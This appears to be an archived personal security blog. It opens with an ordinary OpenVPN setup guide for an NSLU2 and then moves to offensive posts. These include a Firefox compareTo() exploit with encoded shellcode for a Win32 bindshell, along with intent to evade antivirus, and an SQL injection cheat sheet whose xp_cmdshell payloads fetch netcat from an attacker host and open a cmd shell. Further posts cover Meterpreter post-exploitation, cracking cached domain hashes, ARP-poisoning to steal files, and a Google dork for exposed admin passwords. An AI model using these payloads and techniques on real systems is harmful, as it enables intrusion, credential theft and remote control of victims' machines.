OpenVPN on NSLU2

Well I finally picked up a NSLU2 by Linksys. Have to say I am pretty impressed so far. A little device that fits in my hand just replaced 2 of my boxes at home. One for my fileserver and one for my openvpn server. Maybe at a later date I will go about how to flash it with unslung. But it is pretty easy so this doc is just for me to remember how I set up my openvpn.


So first thing is first go buy the NSLU2 and download unslung and flash it.
http://www.nslu2-linux.org/

Now you have it flashed. I put on a few packages first to allow me to work with it a bit better.
OpenSSH
Vim
Bash
Grep

Ok Now we are ready.
SSH to your NSLU2. If you have not set your password yet the default password is "uNSLUng"

Install OpenVPN:
ipkg update;ipkg -force-depends install openvpn

Create Tun:
mkdir /dev/net
mknod /dev/net/tun c 10 200

Install Tun:
insmod tun

Enable Routing:
echo 1 > /proc/sys/net/ipv4/ip_forward

Now its time to generate our certs. I just downloaded openvpn on to my machine to create them. Goes much faster this way
You can download the current openvpn version here.
http://openvpn.net/
Also more details on this process can be found here.
http://openvpn.net/howto.html#pki

CD into the easy-rsa directory and edit the vars file with your information.

. ./vars
./clean-all
./build-ca

Now that the CA is up, we can build the keys for the server.

./build-key-server server

Now we have to build our client certs. I will only be buildling it for one client. I also use password protected certs.

./build-key-pass client1

Note: If you wanted other clients repeat the step with client2(or whatever you like). Remember to always use a unique common name for each client.

Generate Diffie Hellman parameters.
./build-dh

Now we need to create a direcotry on the NSLU2 to copy our keys to.
mkdir -p /opt/etc/openvpn/keys

You can copy these files to the NSLU2, may be a bit different for you:
ca.crt, ca.key, dh1024.pem, server.crt, server.key, 01.pem, 02.pem, 03.pem, and 04.pem

Now lets create a server.conf on the NSLU2 and write our conf file.
You can get a sample conf file from the previous download. I will just touch on the main things I change below.

I use TCP so I can proxy:
# TCP or UDP server?
proto tcp
;proto udp

Choose a cipher of your choice. Must be the same on the client.
# Select a cryptographic cipher.
# This config item must be copied to
# the client config file as well.
;cipher BF-CBC # Blowfish (default)
;cipher AES-128-CBC # AES
;cipher DES-EDE3-CBC # Triple-DES


Make sure it switches to priv nobody.
# You can uncomment this out on
# non-Windows systems.
user nobody
group nobody

Thats pretty much it for the server side.

For the client side. Its pretty much straight forward.Just make sure you have the right certs.
ca.crt
client1.crt
client1.key

Now back to the NSLU2.

For a while I have been trying to get MASQUERADE in iptables to work. But since the module is not in the ipkg repository and it is not enbaled in the kernel, this was not working. If you view the comment below Cooper did get this working and wrote a how-to for this. Since he wanted MASQUERADE for something a bit different I will document how I did it. I wanted it so I can hit other boxes behind the VPN. Without having to creat SSH tunnels (Which is what I was doing).
Here is Cooper's doc on the NSLU site.

http://www.nslu2-linux.org/wiki/HowTo/EnableIPMasquerading

Now, for what I did for MASQUERADE.

First, I install the MASQUERADE modules, I used pre-compiled ones since I'm lazy. You can compile them yourself if you like, Cooper's doc shows you how. Below is a link to pre-compiled ones.

http://www.defector.de/docs/nslu2-ipmasq.htm

Now you can install these.

ipkg-cl install kernel-module-ipt-masquerade_2.4.22.l2.3r63-r7_nslu2.ipk
ipkg-cl install kernel-module-ipt-state_2.4.22.l2.3r63-r7_nslu2.ipk


Now lets install the modules.

insmod ip_tables
insmod iptable_filter
insmod ip_conntrack
insmod iptable_nat
insmod ipt_state
insmod ipt_MASQUERADE

If some modules cannot be found, I may have forgot to document these when I was messing around with different modules.
You can easily find and install them. I actually don't think you even need ipt_state or iptable_filter but I put them in there anyways to have a more full blown iptables.(in case of future work)

example:
ipkg list |grep conntrack

Now lets get all this stuff to run on reboot.


Create /opt/etc/init.d/S24openvpn and make it +x.

###################################################
#!/bin/sh

if [ -n "`pidof openvpn`" ]; then
/bin/killall openvpn 2>/dev/null
fi

# load kernel modules
/sbin/insmod tun
/sbin/insmod ip_tables
/sbin/insmod iptable_filter
/sbin/insmod ip_conntrack
/sbin/insmod iptable_nat
/sbin/insmod ipt_state
/sbin/insmod ipt_MASQUERADE

# enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# set iptables rule
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o ixp0 -j MASQUERADE


# Startup VPN tunnel in daemon mode
/opt/sbin/openvpn --cd /opt/etc/openvpn --daemon \
--log-append /var/log/openvpn.log \
--config server.conf
###################################################


Now you are all set! Test it out !

Thanks to everyone!

Fun w/ FireFox compareTo() Remote Execution

I love firefox, but just could not resist this.

A vulnerbility was found in Mozilla Firefox <= 1.04 when using the
compareTo() function.
http://www.milw0rm.com/id.php?id=1369

You can find older versions of FireFox for testing here.
http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/

The exploit payload contained a return(Just would close the browser).
And what fun is that?

// Payload - Just return..
var payLoadCode=unescape("%u9090%u90C3");

So I thought lets actually execute some abritrary code.

The thing that makes it hard is we cannot just use normal shellcode. We
have to convert it to UTF-16 so the browser can execute it. I suppose
UTF-8 would work also.

For Example:

\x29 would be %u785c%u3932

So here we go, create the shellcode and encode it to UTF-16.
How about something simple like calc.exe.

I found a shellcode encoder. I have had mixed results but you can find it here.
http://www.milw0rm.com/id.php?id=656

// Payload - Calc.exe
var payLoadCode=unescape(
"%u5053%u5053%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7"+
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");

Loaded the page, firefox shutdown and calc.exe poped-up. We can execute!
(tested on WinXP SP2)

While calc.exe was funny not to useful.

Lets bind a port so we can get a shell.

I tried creating different shellcode, things such as adding a user,port
binding, cmd exec, and reverse shells, In both Linux and Windows. The
shellcode was very touchy and had mixed results after encoding to
UTF-16.

This win32 bind shell code did work on WinXP SP2 from SkyLined.

// Payload - Win32 bindshell (port 28876) - SkyLined
var payLoadCode=unescape("%u4343%u4343%u43eb"+
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea"+
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7"+
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64"+
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c"+
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe"+
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0"+
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050"+
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6"+
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650"+
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa"+
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656"+
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1"+
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353"+
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353"+
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe"+
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff"+
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");

Opened the page in FireFox and telneted to port 28876

Although, Symantec did see it as being a Trojan about one minute later.

I will look into changing the shellcode a bit in hope of not triggering Symantec.
Otherwise you would only have one minute after exploit to plant a backdoor.

The exploit uses a method called spraying the stack. Its actually a
pretty cool method by SkyLined to find a predictable address.

I will continue to work on this when time permits, If anyone is
interesed I would like to see other UTF-16 encoded shellcode that
works.

Here is a UTF-16 Payload by SkyLined that is not suppose to set off virus scanners.
I have not tested this one yet.

payLoadCode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");

Below are some links to more info.

http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0104.html
http://www.edup.tudelft.nl/~bjwever/advisory_msie_R6025.html.php

SQL Injection Cheat Sheet

A small reference when testing and using SQL Injection.

Note: This is for my reference, so if there is not enough detail I apologize.


Testing For SQL Injection Vulnerabilities:

We want to see if the input is sanitized or checked, below is something you can insert into the form to check.

ba' or 1=1--

Example:
User: ba' or 1=1--
Pass: ba' or 1=1--

Query Manipulation:

SELECT * FROM table WHERE user='ba'

-TO-

SELECT * FROM table WHERE user='ba' or 1=1--

Other examples (Depending on how the query was written here are other options to try) :

' or '1'='1
' or 1=1--
" or 1=1--
or 1=1--
' or '1'='1
" or "1"="1
') or ('1'='1


Note:( -- ) Is only needed for MS SQL servers. The ( -- ) will tell the server to ignore the rest of the query sometimes can replace with ( # ). This will make sure your signal quotes ( ' ) are in order. Also, if field is hidden you can run the form from your local box w/ the injection in it.


Remote Execution on MS SQL:

Now we know the server is vulnerable, while being nice, the above does not always allow us to bypass the login screen. Or we just may want to do something different. Here is an option.

Start a sniffer on a box you own:

# tcpdump udp and port 53 and victimhostname

Now make the victim do a DNS query against your box:

’; EXEC master..xp_cmdshell ‘nslookup mybox.com’ --

You will see the dns query in your tcpdump output. Which means the EXEC worked! Now you can do whatever you like. For demonstration purposes lets just upload NetCat and execute.

'; EXEC master..xp_cmdshell ‘tftp –I mybox.com GET nc.exe c:\nc.exe' --

Now execute netcat so it’s listening.

'; EXEC master..xp_cmdshell ‘c:\nc.exe –l –p 9999 –e cmd.exe’ –-

Now if you know what to do the box is all yours!

Note: The ( ; ) will end the previous query and start the next. Also, if the ( ' ) is not working try a ( " ).


Conclusion: This is very basic SQL injection. Since it is just a cheat sheet I did not want this to become to long. Later I will cover other topics such as info gathering from ODBC error messages, Column gathering, querying specific things, blind SQL injection.

Other Good Docs:
http://www.securiteam.com/securityreviews/5DP0N1P76E.html
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf

Web Attacking Through Google

An attacker just may be able to do web based attacks through google. The goal of the attacker would be to have google process the malicious request against the target.

I first tested it with the ad-content section of the personal google page, which seems it does at least need some type of RSS content to process it.

For example, Here is a very very basic directory traversal attack:
http://target/showfile.pl?f=../../../fileyouwant

At first I was thinking you can add this to "add content" on the personal page. Didn't seem to work. Like I said earlier it does want some type of RSS content.

So I then tried something like this in "add content".
http://rsssite/rss.php?xml+http://target/showfile.pl?f=../../../fileyouwant

Still no go.

So then I thought google caching.
Basically you setup a static html page on some free web hosting company,the page would have all of the attack links(directory traversals,sql injections,php exploits, etc.)

Wait for google to cache it.
Viewing the page through google cache, the attacker could then launch all of the attacks from google.
This would all be done with a point and click.

Not really that dangerous since if you really wanted to find the attacker, google could provide you with logs. But it would be from an anonymous web site and would be two more steps.(could even proxy the registration of the site)

It would look weird for the person watching the IDS(google attacking??) some may even not think anything of it,thinking its the just the googlebot. Also, it would be hard for the target to block you considering most places do not want to block google.

This just kind of follows up Johnny Long's idea of zero-packet attacks.
http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-long.pdf

Post-Exploitation w/ Meterpreter

Since I seem to forgot how to use Meterpreter everytime. Figured I would just document some basic functions of it.

More information can be found at http://www.metasploit.org

After the box is exploited and you have Meterpreter on the payload you can begin to use.

There are many extenstions that can be used. Different extentions provide different uses.

1. Fs
Provides interaction with the filesystem on the remote machine.
2. Net
Provides interaction with the network stack on the remote machine.
3. Process
Provides interaction with processes on the remote machine.
4. Sys
Provides interaction with the environment on the remote machine.

Here is how you load them.
use -m Process
loadlib: Loading library from ’ext950591.dll’ on the remote machine.

There is a lot you can do but I'm just going to show the what I use the most.
Below will get you a cmd prompt on machine.(assuming its windows)

meterpreter> execute -f cmd -c
execute: Executing ’cmd’...

execute: success, process id is 3516.
execute: allocated channel 1 for new process.

You now have to interact with the assigned channel. Then you got cmd!

meterpreter> interact 1
interact: Switching to interactive console on 1...
meterpreter>
interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS>
Caught Ctrl-C, close interactive session? [y/N] y

With the Fs extentsion you can download and upload files.

meterpreter>use -m Fs
meterpreter>download file location

And thats pretty much what I use the most. Maybe later I will write an advanced section.

Grabbing And Cracking Cached Domain Hashs(mscash) w/ John

This is something I wrote up a while back. Not that great but wanted to document it before I lost it.

---


Background: Its great gaining local admin on a windows box,but then you are limited to that box.
Its much more useful getting a Domain user or even Domain Enterprise Admin!
Assumming you are on a Domain.
Most Windows Domains have password caching turned on.
Which means anytime a domain user logs into the box it is cached in the registry with SYSTEM rights.
Now lets see how we can grab this and crack it.

Note: I only did this in Linux, I have no idea if it work in windows.
Also, I will not go into much technical details on the caching. Google if you want to learn more.
The info is out there.

Tools: 1. John The Ripper(1.6.37) - http://www.openwall.com/john/ (you will need the src, we will patch it)
2. mscashdump - http://www.off-by-one.net/misc/cachedump.html
3. John The Ripper Patch - http://www.banquise.net/misc/patch-john.html (get "the big patch")

Steps: 1. Compile and Patch John(john dir and patch must be in same dir)
-tar xfz john-1.6.37.tar.gz
-gunzip -c john-1.6.37-bigpatch-13.diff.gz | patch -p0 (should see it patching files)
-cd john-1.6.37/src/
-make

Note: Now you have john patched,it can accept much more hashes such as mscash. Another favorite
of mine is Lotus Notes, its pretty easy to get anyone’s Notes hash without even being a user.
I'll save that for a different doc, we'll stick with mscash.

2. Get cached passwords from windows box (must be local admin)
-cmd.exe
-cachedump.exe -v (should first install a service to get SYSTEM rights)
-Output should look like the following.

CacheDump service successfully installed.
Service started.
user1:5E9092870891234FEF30940952359045633456:domain:
domainadmin:D938458093490BF9035649095CC334:domain:
user2:8982390FAB93099EF30940945745:domain:
Service successfully removed.

-copy and paste the hashs to a txt file for john.

3. Now we get to crack it. Your choice on brute or dict.
-./john -format:mscash ./mshashs.txt


Note: Now you just have to wait. Depending on how good the password is.
And that’s It. Have Fun


References:
http://www.off-by-one.net/misc/cachedump.html
http://www.banquise.net/misc/patch-john.html

All Your File Are Belong To Us

Been testing a neat little app called tcpxtract.
http://tcpxtract.sourceforge.net/

What it does is grab files from sniffed traffic though "carving". Can be
used against live sniffing or against a pcap file.

Findings so far:

First, I thought I would run it against a kismet pcap file I had laying
around.
Turned up with a couple of images, must have been people browsing the web.
I would assume other files would work no problem, since wireless it is not a
switched network and all the traffic anyone can see.

1. FILES OWNED

Second, I thought I would fire up ethereal http://www.ethereal.com/ and bind
it to my local Ethernet card to sniff.
I did a few file transfers during the sniff. SCP, FTP, Windows SMB Share(AD
Kerbros)
Saved the sniff in a pcap file and ran tcpxtract against it.

- SCP, I obviously did not grab that file I transferred.
- FTP, Do I even have to tell?
- SMB, Yep grabbed that file too

2. FILES OWNED

Third, I was thinking this isn't that useful. Why do I want to see my own
files transferred and on
a wireless network anyone to transfer anything useful, is just plain stupid.

So, I got to thinking how about a "man in the middle" attack? I Fire up the
handy ettercap http://ettercap.sourceforge.net/
and poison the arp cache on the switch and route all traffic to my local
Ethernet card and then route the packets to their final destination.

Now since all the switch traffic is running though my Ethernet device. I
bind tcpxtract to my
local Ethernet device. And the files started to pour in (mpg, mp3,doc,pdf ,
etc) a lot.

3. FILES OWNED

Now, I'm sure people see the danger here. For security testers/auditors its
a way to rid your company of using
ftp and other non-secure protocols. Do that attack against some highly
sensitive servers, and then show your
manager all the nice sensitive documents you mined!

I will be looking into other methods of using tcpxract.

Snort Back Orifice Preprocessor Buffer Overflow

While looking into US-CERT TA-05-291A. This is what I found.

While snort does review the traffic on port 31337, it will also look
for any UDP traffic that is using Back Orifice's magic cookie.

* spp_bo.c comments
*
* Purpose: Detects Back Orifice traffic by brute forcing the weak encryption
* of the program's network protocol and detects the magic cookie
* that it's servers and clients require to communicate with each
* other.
*
* Back Orifice magic cookie is "*!*QWTY?", which is located in the first
* eight bytes of the packet. But it is encrypted using an XOR.

When exploiting this we want this function of the preprocessor to kick
off. Which is why you will have to create a UDP packet that is not
using port 31337.

Below is where the fun happens.

//snippet from spp_bo.c
static int BoGetDirection(Packet *p, char *pkt_data)
{
u_int32_t len = 0;
u_int32_t id = 0;
u_int32_t l, i;
char type;
char buf1[1024]; #Interesting ??? A static array? Is this checked? hehe
char buf2[1024]; #Interesting ??? A static array? Is this checked? hehe
char *buf_ptr;
char plaintext;
//snippet from spp_bo.c

I don't see any checks.

//snippet from spp_bo.c
/* Only examine data if this a ping request or response */
if ( type == BO_TYPE_PING )
{
i = 0;
buf_ptr = buf1;
*buf1 = 0;
*buf2 = 0;
/* Decrypt data */
while ( i < len )
{
plaintext = (char) (*pkt_data ^ (BoRand()%256));
*buf_ptr = plaintext;
i++;
pkt_data++;
buf_ptr++;
if ( plaintext == 0 )
buf_ptr = buf2;
}

/* null-terminate string */
*buf_ptr = 0;

DEBUG_WRAP(DebugMessage(DEBUG_PLUGIN, "buf1 = %s\n", buf1););

if ( *buf2 != 0 )
{
DEBUG_WRAP(DebugMessage(DEBUG_PLUGIN, "buf2 = %s\n",buf2););
}

DEBUG_WRAP(DebugMessage(DEBUG_PLUGIN, "crc = 0x%x\n", (char)
(*pkt_data ^ (BoRand()%256))););

if ( len > 4 && !strncasecmp((buf1+3), "PONG", 4) )
{
return BO_FROM_SERVER;
}
else
{
return BO_FROM_CLIENT;
}
}
//snippet from spp_bo.c

To validate it a bit more I ran the code through flawfinder. This is
the output.

Examining spp_bo.c
spp_bo.c:430: [2] (buffer) char:
Statically-sized arrays can be overflowed. Perform bounds checking,
use functions that limit length, or ensure that the size is larger
than
the maximum possible length.
spp_bo.c:431: [2] (buffer) char:
Statically-sized arrays can be overflowed. Perform bounds checking,
use functions that limit length, or ensure that the size is larger
than
the maximum possible length.

Just my findings.

kPan1c.dc414.org

Just added this blog with masking to http://kPan1c.dc414.org. So you can always just hit that.

GoogleDork SysPrep Hack

Not sure if you guys know what googledorks are. Basically custom google
querys that find some interesting stuff. Johnny Long talks a lot more
about them and has a whole database of them on his site
http://johnny.ihackstuff.com/.

Now to the fun stuff. Not sure if this has been done or not but here it
goes.

I was talking to someone about sysprep (things it does, options you can
set, etc.)

Which got me thinking of my next idea.

GoogleDork:
+"AdminPassword" | "DomainAdmin" | "DomainAdminPassword"
inurl:sysprep.inf

I know this is a pretty simple googledork(but you would be amazed at
the findings). If anyone has a better way of doing it or expanding it,
I would love to see it.

Just Up

Just my site to document my thoughts. Went with livejournal because of the linux client. My icon of the keyboard is just when I was bored with my camera phone. Nothing else to say.